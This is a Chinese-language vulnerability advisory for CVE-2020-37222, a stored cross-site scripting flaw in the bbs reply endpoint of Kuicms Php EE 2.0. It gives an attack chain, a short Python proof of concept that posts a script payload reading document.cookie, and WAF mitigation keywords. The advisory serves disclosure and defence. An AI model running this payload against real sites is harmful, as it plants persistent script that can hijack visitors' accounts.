CVE-2020-37222 Kuicms存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2020-37222

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Kuicms Php EE

漏洞概述

Kuicms Php EE 2.0存在存储型XSS漏洞，攻击者无需认证即可通过bbs回复接口提交恶意脚本，导致在用户浏览器中执行任意代码。

技术细节

该漏洞存在于Kuicms Php EE 2.0的bbs回复功能模块中。由于服务器端未对用户提交的content参数进行充分的过滤和转义，允许攻击者通过发送特制的POST请求到/web/?c=bbs&a=reply端点，注入恶意的HTML或JavaScript代码。这些代码被持久化存储在数据库中，当其他用户浏览包含该恶意回复的页面时，脚本将在受害者浏览器中解析执行，从而可能导致账户劫持或恶意操作。

攻击链分析

STEP 1

漏洞探测

攻击者识别目标系统为Kuicms Php EE 2.0，并定位到bbs回复接口。

STEP 2

恶意注入

攻击者构造包含JavaScript代码的POST请求发送至/web/?c=bbs&a=reply，content参数包含XSS Payload。

STEP 3

载荷存储

服务器未过滤恶意代码，将其存储在数据库中。

STEP 4

触发执行

管理员或普通用户访问包含恶意回复的页面，浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Exploit endpoint
    url = f"{target_url}/web/?c=bbs&a=reply"
    
    # Malicious payload
    payload = "<script>alert(document.cookie);</script>"
    
    # Post data
    data = {
        "content": payload
    }
    
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check the bbs reply section.")
        else:
            print("[-] Failed to send payload.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1"
    exploit(target)

影响范围

Kuicms Php EE 2.0

防御指南

临时缓解措施

建议暂时禁用bbs回复功能，或在Web应用防火墙(WAF)中配置规则，拦截包含<script>、onerror等关键字的请求流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2020-37222
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2020-37222
3 Details https://www.cvedetails.com/cve/CVE-2020-37222/
4 VulDB https://vuldb.com/cve/CVE-2020-37222
5 Link https://kuicms.com
6 Link https://kuicms.com/kuicms.zip
7 Link https://www.exploit-db.com/exploits/48526
8 Link https://www.vulncheck.com/advisories/kuicms-php-ee-persistent-cross-site-scripting-via-bbs-reply